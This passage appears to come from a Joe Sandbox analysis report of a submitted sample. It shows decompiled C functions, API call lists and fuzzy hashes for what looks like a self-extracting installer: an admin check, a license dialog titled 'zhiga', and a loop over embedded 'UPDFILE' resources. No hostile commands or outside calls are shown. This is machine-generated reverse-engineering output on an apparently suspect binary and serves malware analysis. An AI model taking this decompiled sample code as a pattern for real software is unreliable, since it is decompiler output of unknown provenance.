                                                          					FreeLibrary(_t36);
                                                          				}
                                                          				return E01096CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                          			}



















                                                          0x010917f6
                                                          0x010917fd
                                                          0x01091805
                                                          0x0109180b
                                                          0x0109180d
                                                          0x01091815
                                                          0x01091818
                                                          0x01091820
                                                          0x01091824
                                                          0x0109182c
                                                          0x01091832
                                                          0x01091837
                                                          0x01091851
                                                          0x01091854
                                                          0x0109185d
                                                          0x01091862
                                                          0x0109186c
                                                          0x01091872
                                                          0x01091877
                                                          0x0109187e
                                                          0x0109187e
                                                          0x01091883
                                                          0x01091883
                                                          0x0109185d
                                                          0x0109188a
                                                          0x0109188a
                                                          0x010918a2

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010918DD), ref: 0109181A
                                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0109182C
                                                          • AllocateAndInitializeSid.ADVAPI32(010918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010918DD), ref: 01091855
                                                          • FreeSid.ADVAPI32(?,?,?,?,010918DD), ref: 01091883
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,010918DD), ref: 0109188A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                          • API String ID: 4204503880-1888249752
                                                          • Opcode ID: 9e1e01799e5408b81c36ecbf9465fa33ab96c7616a411c45f9072f3d2c89abf2
                                                          • Instruction ID: bf718ba98bf00be11c8c1b436632ece16fee329975b3f8990ee91f4f0da010c0
                                                          • Opcode Fuzzy Hash: 9e1e01799e5408b81c36ecbf9465fa33ab96c7616a411c45f9072f3d2c89abf2
                                                          • Instruction Fuzzy Hash: 5A119371F0020AEBDB109FA4DC59ABFBBB8FF84710F1005A9FA51E7280DA359D009B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01093450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                          				void* _t7;
                                                          				void* _t11;
                                                          				struct HWND__* _t12;
                                                          				int _t22;
                                                          				struct HWND__* _t24;
                                                          
                                                          				_t7 = _a8 - 0x10;
                                                          				if(_t7 == 0) {
                                                          					EndDialog(_a4, 2);
                                                          					L11:
                                                          					return 1;
                                                          				}
                                                          				_t11 = _t7 - 0x100;
                                                          				if(_t11 == 0) {
                                                          					_t12 = GetDesktopWindow();
                                                          					_t24 = _a4;
                                                          					E010943D0(_t24, _t12);
                                                          					SetWindowTextA(_t24, "zhiga");
                                                          					SetDlgItemTextA(_t24, 0x838,  *0x1099404);
                                                          					SetForegroundWindow(_t24);
                                                          					goto L11;
                                                          				}
                                                          				if(_t11 == 1) {
                                                          					_t22 = _a12;
                                                          					if(_t22 < 6) {
                                                          						goto L11;
                                                          					}
                                                          					if(_t22 <= 7) {
                                                          						L8:
                                                          						EndDialog(_a4, _t22);
                                                          						return 1;
                                                          					}
                                                          					if(_t22 != 0x839) {
                                                          						goto L11;
                                                          					}
                                                          					 *0x10991dc = 1;
                                                          					goto L8;
                                                          				}
                                                          				return 0;
                                                          			}








                                                          0x01093459
                                                          0x0109345c
                                                          0x010934d8
                                                          0x010934de
                                                          0x00000000
                                                          0x010934e0
                                                          0x0109345e
                                                          0x01093463
                                                          0x0109349a
                                                          0x010934a0
                                                          0x010934a7
                                                          0x010934b2
                                                          0x010934c4
                                                          0x010934cb
                                                          0x00000000
                                                          0x010934cb
                                                          0x01093468
                                                          0x0109346e
                                                          0x01093474
                                                          0x00000000
                                                          0x00000000
                                                          0x0109347c
                                                          0x0109348c
                                                          0x01093490
                                                          0x00000000
                                                          0x01093496
                                                          0x01093484
                                                          0x00000000
                                                          0x00000000
                                                          0x01093486
                                                          0x00000000
                                                          0x01093486
                                                          0x00000000

                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 01093490
                                                          • GetDesktopWindow.USER32 ref: 0109349A
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010934B2
                                                          • SetDlgItemTextA.USER32(?,00000838), ref: 010934C4
                                                          • SetForegroundWindow.USER32(?), ref: 010934CB
                                                          • EndDialog.USER32(?,00000002), ref: 010934D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Window$DialogText$DesktopForegroundItem
                                                          • String ID: zhiga
                                                          • API String ID: 852535152-3705506974
                                                          • Opcode ID: c0b95ebff9a1eaa40981d0ca56fc0e7ec2e7c8d0113b0dc05a6a2609ed628b7f
                                                          • Instruction ID: 281337913b2ebb06e049defe3b4ee487157e955c01406e7d7d5ffad90b028548
                                                          • Opcode Fuzzy Hash: c0b95ebff9a1eaa40981d0ca56fc0e7ec2e7c8d0113b0dc05a6a2609ed628b7f
                                                          • Instruction Fuzzy Hash: 9F019279340114ABDB265F79D83C96D3A64FB09750B024024FAD68A594CE36A941EF84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E01092AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t16;
                                                          				int _t21;
                                                          				char _t32;
                                                          				intOrPtr _t34;
                                                          				char* _t38;
                                                          				char _t42;
                                                          				char* _t44;
                                                          				CHAR* _t52;
                                                          				intOrPtr* _t55;
                                                          				CHAR* _t59;
                                                          				void* _t62;
                                                          				CHAR* _t64;
                                                          				CHAR* _t65;
                                                          				signed int _t66;
                                                          
                                                          				_t60 = __edx;
                                                          				_t16 =  *0x1098004; // 0x8a9c601
                                                          				_t17 = _t16 ^ _t66;
                                                          				_v8 = _t16 ^ _t66;
                                                          				_t65 = _a4;
                                                          				_t44 = __edx;
                                                          				_t64 = __ecx;
                                                          				if( *((char*)(__ecx)) != 0) {
                                                          					GetModuleFileNameA( *0x1099a3c,  &_v268, 0x104);
                                                          					while(1) {
                                                          						_t17 =  *_t64;
                                                          						if(_t17 == 0) {
                                                          							break;
                                                          						}
                                                          						_t21 = IsDBCSLeadByte(_t17);
                                                          						 *_t65 =  *_t64;
                                                          						if(_t21 != 0) {
                                                          							_t65[1] = _t64[1];
                                                          						}
                                                          						if( *_t64 != 0x23) {
                                                          							L19:
                                                          							_t65 = CharNextA(_t65);
                                                          						} else {
                                                          							_t64 = CharNextA(_t64);
                                                          							if(CharUpperA( *_t64) != 0x44) {
                                                          								if(CharUpperA( *_t64) != 0x45) {
                                                          									if( *_t64 == 0x23) {
                                                          										goto L19;
                                                          									}
                                                          								} else {
                                                          									E01091680(_t65, E010917C8(_t44, _t65),  &_v268);
                                                          									_t52 = _t65;
                                                          									_t14 =  &(_t52[1]); // 0x2
                                                          									_t60 = _t14;
                                                          									do {
                                                          										_t32 =  *_t52;
                                                          										_t52 =  &(_t52[1]);
                                                          									} while (_t32 != 0);
                                                          									goto L17;
                                                          								}
                                                          							} else {
                                                          								E010965E8( &_v268);
                                                          								_t55 =  &_v268;
                                                          								_t62 = _t55 + 1;
                                                          								do {
                                                          									_t34 =  *_t55;
                                                          									_t55 = _t55 + 1;
                                                          								} while (_t34 != 0);
                                                          								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                          								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                          									 *_t38 = 0;
                                                          								}
                                                          								E01091680(_t65, E010917C8(_t44, _t65),  &_v268);
                                                          								_t59 = _t65;
                                                          								_t12 =  &(_t59[1]); // 0x2
                                                          								_t60 = _t12;
                                                          								do {
                                                          									_t42 =  *_t59;
                                                          									_t59 =  &(_t59[1]);
                                                          								} while (_t42 != 0);
                                                          								L17:
                                                          								_t65 =  &(_t65[_t52 - _t60]);
                                                          							}
                                                          						}
                                                          						_t64 = CharNextA(_t64);
                                                          					}
                                                          					 *_t65 = _t17;
                                                          				}
                                                          				return E01096CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                          			}






















                                                          0x01092aac
                                                          0x01092ab7
                                                          0x01092abc
                                                          0x01092abe
                                                          0x01092ac3
                                                          0x01092ac6
                                                          0x01092ac9
                                                          0x01092ace
                                                          0x01092ae6
                                                          0x01092bdc
                                                          0x01092bdc
                                                          0x01092be0
                                                          0x00000000
                                                          0x00000000
                                                          0x01092af2
                                                          0x01092afc
                                                          0x01092b00
                                                          0x01092b05
                                                          0x01092b05
                                                          0x01092b0b
                                                          0x01092bca
                                                          0x01092bd1
                                                          0x01092b11
                                                          0x01092b18
                                                          0x01092b26
                                                          0x01092b99
                                                          0x01092bc8
                                                          0x00000000
                                                          0x00000000
                                                          0x01092b9b
                                                          0x01092bae
                                                          0x01092bb3
                                                          0x01092bb5
                                                          0x01092bb5
                                                          0x01092bb8
                                                          0x01092bb8
                                                          0x01092bba
                                                          0x01092bbb
                                                          0x00000000
                                                          0x01092bb8
                                                          0x01092b28
                                                          0x01092b2e
                                                          0x01092b33
                                                          0x01092b39
                                                          0x01092b3c
                                                          0x01092b3c
                                                          0x01092b3e
                                                          0x01092b3f
                                                          0x01092b55
                                                          0x01092b5d
                                                          0x01092b64
                                                          0x01092b64
                                                          0x01092b7a
                                                          0x01092b7f
                                                          0x01092b81
                                                          0x01092b81
                                                          0x01092b84
                                                          0x01092b84
                                                          0x01092b86
                                                          0x01092b87
                                                          0x01092bbf
                                                          0x01092bc1
                                                          0x01092bc1
                                                          0x01092b26
                                                          0x01092bda
                                                          0x01092bda
                                                          0x01092be6
                                                          0x01092be6
                                                          0x01092bf8

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 01092AE6
                                                          • IsDBCSLeadByte.KERNEL32(00000000), ref: 01092AF2
                                                          • CharNextA.USER32(?), ref: 01092B12
                                                          • CharUpperA.USER32 ref: 01092B1E
                                                          • CharPrevA.USER32(?,?), ref: 01092B55
                                                          • CharNextA.USER32(?), ref: 01092BD4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                          • String ID:
                                                          • API String ID: 571164536-0
                                                          • Opcode ID: f1ea353f3a3312685601f240b84be1ddea901d70258c5a72ded2fcbb622f533d
                                                          • Instruction ID: cf00678eb0da469cb9b006e70c537b4085f2da7c9efd8e9487753b0d4f57a337
                                                          • Opcode Fuzzy Hash: f1ea353f3a3312685601f240b84be1ddea901d70258c5a72ded2fcbb622f533d
                                                          • Instruction Fuzzy Hash: E7412A74604146AFDF669F38D874AFD7BE9AF56350F1400DAD8C283242DB3A4A46DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E010943D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                          				signed int _v8;
                                                          				struct tagRECT _v24;
                                                          				struct tagRECT _v40;
                                                          				struct HWND__* _v44;
                                                          				intOrPtr _v48;
                                                          				int _v52;
                                                          				intOrPtr _v56;
                                                          				int _v60;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t29;
                                                          				void* _t53;
                                                          				intOrPtr _t56;
                                                          				int _t59;
                                                          				struct HWND__* _t63;
                                                          				struct HWND__* _t67;
                                                          				struct HWND__* _t68;
                                                          				struct HDC__* _t69;
                                                          				int _t72;
                                                          				signed int _t74;
                                                          
                                                          				_t63 = __edx;
                                                          				_t29 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t29 ^ _t74;
                                                          				_t68 = __edx;
                                                          				_v44 = __ecx;
                                                          				GetWindowRect(__ecx,  &_v40);
                                                          				_t53 = _v40.bottom - _v40.top;
                                                          				_v48 = _v40.right - _v40.left;
                                                          				GetWindowRect(_t68,  &_v24);
                                                          				_v56 = _v24.bottom - _v24.top;
                                                          				_t69 = GetDC(_v44);
                                                          				_v52 = GetDeviceCaps(_t69, 8);
                                                          				_v60 = GetDeviceCaps(_t69, 0xa);
                                                          				ReleaseDC(_v44, _t69);
                                                          				_t56 = _v48;
                                                          				asm("cdq");
                                                          				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                          				_t67 = 0;
                                                          				if(_t72 >= 0) {
                                                          					_t63 = _v52;
                                                          					if(_t72 + _t56 > _t63) {
                                                          						_t72 = _t63 - _t56;
                                                          					}
                                                          				} else {
                                                          					_t72 = _t67;
                                                          				}
                                                          				asm("cdq");
                                                          				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                          				if(_t59 >= 0) {
                                                          					_t63 = _v60;
                                                          					if(_t59 + _t53 > _t63) {
                                                          						_t59 = _t63 - _t53;
                                                          					}
                                                          				} else {
                                                          					_t59 = _t67;
                                                          				}
                                                          				return E01096CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                          			}
























                                                          0x010943d0
                                                          0x010943d8
                                                          0x010943df
                                                          0x010943e6
                                                          0x010943ec
                                                          0x010943f1
                                                          0x01094400
                                                          0x01094403
                                                          0x0109440b
                                                          0x01094420
                                                          0x01094429
                                                          0x01094437
                                                          0x01094444
                                                          0x01094447
                                                          0x0109444d
                                                          0x01094454
                                                          0x0109445b
                                                          0x01094460
                                                          0x01094461
                                                          0x01094467
                                                          0x0109446f
                                                          0x01094473
                                                          0x01094473
                                                          0x01094463
                                                          0x01094463
                                                          0x01094463
                                                          0x0109447a
                                                          0x01094481
                                                          0x01094484
                                                          0x0109448a
                                                          0x01094492
                                                          0x01094496
                                                          0x01094496
                                                          0x01094486
                                                          0x01094486
                                                          0x01094486
                                                          0x010944b8

                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 010943F1
                                                          • GetWindowRect.USER32(00000000,?), ref: 0109440B
                                                          • GetDC.USER32(?), ref: 01094423
                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0109442E
                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0109443A
                                                          • ReleaseDC.USER32(?,00000000), ref: 01094447
                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010944A2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Window$CapsDeviceRect$Release
                                                          • String ID:
                                                          • API String ID: 2212493051-0
                                                          • Opcode ID: dc30fffb3ec68c1e6b1d8c12eb1600953910e4222285b24b919089ce825df7c6
                                                          • Instruction ID: 63a50890fbd669083e619dc79c36a1a7e2245b518553e0a8459fe5af29dc5075
                                                          • Opcode Fuzzy Hash: dc30fffb3ec68c1e6b1d8c12eb1600953910e4222285b24b919089ce825df7c6
                                                          • Instruction Fuzzy Hash: 3E311872E00119AFCF14CEB8DA989EEBBB5FB89310F154169F845F3244DA35AD058B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E01096298(intOrPtr __ecx, intOrPtr* __edx) {
                                                          				signed int _v8;
                                                          				char _v28;
                                                          				intOrPtr _v32;
                                                          				struct HINSTANCE__* _v36;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t16;
                                                          				struct HRSRC__* _t21;
                                                          				intOrPtr _t26;
                                                          				void* _t30;
                                                          				struct HINSTANCE__* _t36;
                                                          				intOrPtr* _t40;
                                                          				void* _t41;
                                                          				intOrPtr* _t44;
                                                          				intOrPtr* _t45;
                                                          				void* _t47;
                                                          				signed int _t50;
                                                          				struct HINSTANCE__* _t51;
                                                          
                                                          				_t44 = __edx;
                                                          				_t16 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t16 ^ _t50;
                                                          				_t46 = 0;
                                                          				_v32 = __ecx;
                                                          				_v36 = 0;
                                                          				_t36 = 1;
                                                          				E0109171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                          				while(1) {
                                                          					_t51 = _t51 + 0x10;
                                                          					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                          					if(_t21 == 0) {
                                                          						break;
                                                          					}
                                                          					_t45 = LockResource(LoadResource(_t46, _t21));
                                                          					if(_t45 == 0) {
                                                          						 *0x1099124 = 0x80070714;
                                                          						_t36 = _t46;
                                                          					} else {
                                                          						_t5 = _t45 + 8; // 0x8
                                                          						_t44 = _t5;
                                                          						_t40 = _t44;
                                                          						_t6 = _t40 + 1; // 0x9
                                                          						_t47 = _t6;
                                                          						do {
                                                          							_t26 =  *_t40;
                                                          							_t40 = _t40 + 1;
                                                          						} while (_t26 != 0);
                                                          						_t41 = _t40 - _t47;
                                                          						_t46 = _t51;
                                                          						_t7 = _t41 + 1; // 0xa
                                                          						 *0x109a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                          						_t30 = _v32();
                                                          						if(_t51 != _t51) {
                                                          							asm("int 0x29");
                                                          						}
                                                          						_push(_t45);
                                                          						if(_t30 == 0) {
                                                          							_t36 = 0;
                                                          							FreeResource(??);
                                                          						} else {
                                                          							FreeResource();
                                                          							_v36 = _v36 + 1;
                                                          							E0109171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                          							_t46 = 0;
                                                          							continue;
                                                          						}
                                                          					}
                                                          					L12:
                                                          					return E01096CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                          				}
                                                          				goto L12;
                                                          			}






















                                                          0x01096298
                                                          0x010962a0
                                                          0x010962a7
                                                          0x010962ad
                                                          0x010962af
                                                          0x010962bb
                                                          0x010962c3
                                                          0x010962c4
                                                          0x0109633b
                                                          0x0109633b
                                                          0x01096345
                                                          0x0109634d
                                                          0x00000000
                                                          0x00000000
                                                          0x010962da
                                                          0x010962de
                                                          0x0109635f
                                                          0x01096369
                                                          0x010962e0
                                                          0x010962e0
                                                          0x010962e0
                                                          0x010962e3
                                                          0x010962e5
                                                          0x010962e5
                                                          0x010962e8
                                                          0x010962e8
                                                          0x010962ea
                                                          0x010962eb
                                                          0x010962ef
                                                          0x010962f1
                                                          0x010962f3
                                                          0x01096302
                                                          0x01096308
                                                          0x0109630d
                                                          0x01096314
                                                          0x01096314
                                                          0x01096316
                                                          0x01096319
                                                          0x01096355
                                                          0x01096357
                                                          0x0109631b
                                                          0x0109631b
                                                          0x01096331
                                                          0x01096334
                                                          0x01096339
                                                          0x00000000
                                                          0x01096339
                                                          0x01096319
                                                          0x0109636b
                                                          0x0109637d
                                                          0x0109637d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0109171E: _vsnprintf.MSVCRT ref: 01091750
                                                          • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010951CA,00000004,00000024,01092F71,?,00000002,00000000), ref: 010962CD
                                                          • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010951CA,00000004,00000024,01092F71,?,00000002,00000000), ref: 010962D4
                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010951CA,00000004,00000024,01092F71,?,00000002,00000000), ref: 0109631B
                                                          • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 01096345
                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010951CA,00000004,00000024,01092F71,?,00000002,00000000), ref: 01096357
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                          • String ID: UPDFILE%lu
                                                          • API String ID: 2922116661-2329316264
                                                          • Opcode ID: 3763e9582f051459d6dcf5fed6403a882af21359e9fb1e0a4fda247bb981684d
                                                          • Instruction ID: e574a54c415843d068e2f974c5bbe5e12bccdf18375cc5d19f50ba44a80826b6
                                                          • Opcode Fuzzy Hash: 3763e9582f051459d6dcf5fed6403a882af21359e9fb1e0a4fda247bb981684d
                                                          • Instruction Fuzzy Hash: 1121F875B0021AAFDF219F65DC659FEBB78FB44714B008159F982A3240D73B99019BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E0109681F(void* __ebx) {
                                                          				signed int _v8;
                                                          				char _v20;
                                                          				struct _OSVERSIONINFOA _v168;
                                                          				void* _v172;
                                                          				int* _v176;
                                                          				int _v180;
                                                          				int _v184;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t19;
                                                          				long _t31;
                                                          				signed int _t35;
                                                          				void* _t36;
                                                          				intOrPtr _t41;
                                                          				signed int _t44;
                                                          
                                                          				_t36 = __ebx;
                                                          				_t19 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t19 ^ _t44;
                                                          				_t41 =  *0x10981d8; // 0xfffffffe
                                                          				_t43 = 0;
                                                          				_v180 = 0xc;
                                                          				_v176 = 0;
                                                          				if(_t41 == 0xfffffffe) {
                                                          					 *0x10981d8 = 0;
                                                          					_v168.dwOSVersionInfoSize = 0x94;
                                                          					if(GetVersionExA( &_v168) == 0) {
                                                          						L12:
                                                          						_t41 =  *0x10981d8; // 0xfffffffe
                                                          					} else {
                                                          						_t41 = 1;
                                                          						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                          							goto L12;
                                                          						} else {
                                                          							_t31 = RegQueryValueExA(_v172, 0x1091140, 0,  &_v184,  &_v20,  &_v180);
                                                          							_t43 = _t31;
                                                          							RegCloseKey(_v172);
                                                          							if(_t31 != 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t40 =  &_v176;
                                                          								if(E010966F9( &_v20,  &_v176) == 0) {
                                                          									goto L12;
                                                          								} else {
                                                          									_t35 = _v176 & 0x000003ff;
                                                          									if(_t35 == 1 || _t35 == 0xd) {
                                                          										 *0x10981d8 = _t41;
                                                          									} else {
                                                          										goto L12;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return E01096CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                          			}


















                                                          0x0109681f
                                                          0x0109682a
                                                          0x01096831
                                                          0x01096836
                                                          0x0109683c
                                                          0x0109683e
                                                          0x01096848
                                                          0x01096851
                                                          0x0109685d
                                                          0x01096864
                                                          0x01096876
                                                          0x0109693a
                                                          0x0109693a
                                                          0x0109687c
                                                          0x0109687e
                                                          0x01096885
                                                          0x00000000
                                                          0x010968d6
                                                          0x010968f4
                                                          0x01096900
                                                          0x01096902
                                                          0x0109690a
                                                          0x00000000
                                                          0x0109690c
                                                          0x0109690c
                                                          0x0109691c
                                                          0x00000000
                                                          0x0109691e
                                                          0x01096924
                                                          0x0109692b
                                                          0x01096932
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0109692b
                                                          0x0109691c
                                                          0x0109690a
                                                          0x01096885
                                                          0x01096876
                                                          0x01096951

                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0109686E
                                                          • GetSystemMetrics.USER32(0000004A), ref: 010968A7
                                                          • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010968CC
                                                          • RegQueryValueExA.ADVAPI32(?,01091140,00000000,?,?,0000000C), ref: 010968F4
                                                          • RegCloseKey.ADVAPI32(?), ref: 01096902
                                                            • Part of subcall function 010966F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0109691A), ref: 01096741
                                                          Strings
                                                          • Control Panel\Desktop\ResourceLocale, xrefs: 010968C2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                          • API String ID: 3346862599-1109908249
                                                          • Opcode ID: 206c4f4cbc53db3354ebf9f5f5b5486bbc1d9218fd9198121288cf9855df9a49
                                                          • Instruction ID: e7bf8eaddebc5782af89251379bd2a63275c694f366dc7eeaa3fc65d60256558
                                                          • Opcode Fuzzy Hash: 206c4f4cbc53db3354ebf9f5f5b5486bbc1d9218fd9198121288cf9855df9a49
                                                          • Instruction Fuzzy Hash: 6D317F71A00228DFDF318B15CC64BEAB7BCFB46764F0041E6E989A6240D7369985DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01093A3F(void* __eflags) {
                                                          				void* _t3;
                                                          				void* _t9;
                                                          				CHAR* _t16;
                                                          
                                                          				_t16 = "LICENSE";
                                                          				_t1 = E0109468F(_t16, 0, 0) + 1; // 0x1
                                                          				_t3 = LocalAlloc(0x40, _t1);
                                                          				 *0x1098d4c = _t3;
                                                          				if(_t3 != 0) {
                                                          					_t19 = _t16;
                                                          					if(E0109468F(_t16, _t3, _t28) != 0) {
                                                          						if(lstrcmpA( *0x1098d4c, "<None>") == 0) {
                                                          							LocalFree( *0x1098d4c);
                                                          							L9:
                                                          							 *0x1099124 = 0;
                                                          							return 1;
                                                          						}
                                                          						_t9 = E01096517(_t19, 0x7d1, 0, E01093100, 0, 0);
                                                          						LocalFree( *0x1098d4c);
                                                          						if(_t9 != 0) {
                                                          							goto L9;
                                                          						}
                                                          						 *0x1099124 = 0x800704c7;
                                                          						L2:
                                                          						return 0;
                                                          					}
                                                          					E010944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          					LocalFree( *0x1098d4c);
                                                          					 *0x1099124 = 0x80070714;
                                                          					goto L2;
                                                          				}
                                                          				E010944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          				 *0x1099124 = E01096285();
                                                          				goto L2;
                                                          			}






